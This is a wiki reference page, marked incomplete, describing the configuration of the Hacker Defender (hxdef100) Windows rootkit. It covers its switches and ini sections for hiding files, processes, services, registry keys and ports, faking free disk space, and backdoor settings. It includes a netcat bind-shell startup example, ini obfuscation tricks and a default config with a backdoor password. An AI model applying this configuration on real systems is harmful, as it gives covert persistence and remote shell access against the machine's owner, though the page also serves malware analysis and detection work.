Hacker-Defender-hxdef/rootkit-hxdef100

From aldeid
Jump to navigation Jump to search
You are here:
rootkit and ini file

Description

INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Usage

Syntax

hxdef100.exe [inifile]
Note

or 

hxdef100.exe [switch]
Note

Options (switch)

installonly
only install service, but not run
refresh
use to update settings from inifile
noservice
doesn't install services and run normally
uninstall
removes hxdef from the memory and kills all running backdoor connections stopping hxdef service does the same now

The ini file

Syntax

Sections and special characters

The ini file is composed of following sections:

Following extra characters can be added to ini file (under certain conditions) to obfuscate the file:

  • |
  • <
  • >
  • :
  • \
  • /
  • "

Example: 

[H<<<idden T>>a/"ble]
>h"xdef"*

is the same as 

[Hidden Table]
hxdef*

[Hidden Table]

List of files, directories and processes which should be hidden. All files and directories in this list will disappear from file managers. Programs in this list will be hidden in tasklist. Make sure main file, inifile, your backdoor file and driver file are mentioned in this list.

[Root Processes]

List of programs which will be immune against infection. You can see hidden files, directories and programs only with these root programs. So, root processes are for rootkit admins. To be mentioned in Root Processes doesn't mean you're hidden. It is possible to have root process which is not hidden and vice versa.

[Hidden Services]

List of service and driver names which will be hidden in the database of installed services and drivers. Service name for the main rootkit program is HackerDefender100 as default, driver name for the main rootkit driver is HackerDefenderDrv100. Both can be changed in the inifile.

[Hidden RegKeys]

List of registry keys which will be hidden. Rootkit has four keys in registry:

  • HackerDefender100
  • LEGACY_HACKERDEFENDER100
  • HackerDefenderDrv100
  • LEGACY_HACKERDEFENDERDRV100

If you rename service name or driver name you should also change this list.

First two registry keys for service and driver are the same as its name. Next two are LEGACY_NAME. For example if you change your service name to BoomThisIsMySvc your registry entry will be LEGACY_BOOMTHISISMYSVC.

[Hidden RegValues]

List of registry values which will be hidden.

[Startup Run]

List of programs which rootkit runs after its startup. These programs will have same rights as rootkit. Program name is divided from its arguments with question tag. Do not use " characters. Programs will terminate after user logon. Use common and well known methods for starting programs after user logon. You can use following shortcuts here:

%cmd% stands for system shell exacutable + path (e.g. C:\winnt\system32\cmd.exe)
%cmddir% stands for system shell executable directory (e.g. C:\winnt\system32\)
%sysdir% stands for system directory (e.g. C:\winnt\system32\)
%windir% stands for Windows directory (e.g. C:\winnt\)
%tmpdir% stands for temporary directory (e.g. C:\winnt\temp\)

Examples: 

c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

netcat-shell is run after rootkit startup and listens on port 100 

%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt

This will put a time stamp to temporary_directory\starttime.txt (e.g. C:\winnt\temp\starttime.txt) everytime rootkit starts (%TIME% works only with Windows 2000 and higher)

[Free Space]

List of harddrives and a number of bytes you want to add to a free space. The list item format is X:NUM where X stands for the drive letter and <tt<NUM is the number of bytes that will be added to its number of free bytes.

Example: 

C:123456789

this will add about 123 MB more to shown free disk space of disk C

[Hidden Ports]

List of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, Tcp View etc. It has at most 2 lines:

  • First line format is TCP:tppport1,tcpport2,tcpport3 ...
  • Second line format is UDP:udpport1,udpport2,udpport3 ...

Examples: 

TCP:8080,456

this will hide two ports: 8080/TCP and 456/TCP 

TCP:8001
UDP:12345

This will hide two ports: 8001/TCP and 12345/UDP 

TCP:
UDP:53,54,55,56,800

This will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP

[Settings]

Contains eigth values:

Password
Password which is 16 character string used when working with backdoor or redirector. Password can be shorter, rest is filled with spaces.
BackdoorShell
Name for file copy of the system shell which is created by backdoor in temporary directory.
FileMappingName
Name of shared memory where the settings for hooked processes are stored.
ServiceName
Name of rootkit service
ServiceDisplayName
Display name for rootkit service
ServiceDescription
Description for rootkit service
DriverName
Name for hxdef driver
DriverFileName
Name for hxdef driver file.

Example:

Key/value Description
Password=hxdef-rulez your backdoor password is "hxdef-rulez"
BackdoorShell=hxdefá$.exe backdoor will copy system shell file (usually cmd.exe) to "hxdefá$.exe" to temp
FileMappingName=_.-=[Hacker Defender]=-._ Name of shared memory will be "_.-=[Hacker Defender]=-._"
ServiceName=HackerDefender100 Name of a service is "HackerDefender100"
ServiceDisplayName=HXD Service 100 its display name is "HXD Service 100"
ServiceDescription=powerful NT rootkit its description is "poweful NT rootkit"
DriverName=HackerDefenderDrv100 Name of a driver is "HackerDefenderDrv100"
DriverFileName=hxdefdrv.sys Driver will be stored in a file called "hxdefdrv.sys"

Default ini file

[Hidden Table]
hxdef*
rcmd.exe

[Root Processes]
hxdef*
rcmd.exe

[Hidden Services]
HackerDefender*
       
[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100
           
[Hidden RegValues]
          
[Startup Run]

[Free Space]

[Hidden Ports]

[Settings]  
Password=hxdef-rulez
BackdoorShell=hxdefß$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys

Comments

Retrieved from "https://www.aldeid.com/w/index.php?title=Hacker-Defender-hxdef/rootkit-hxdef100&oldid=24562"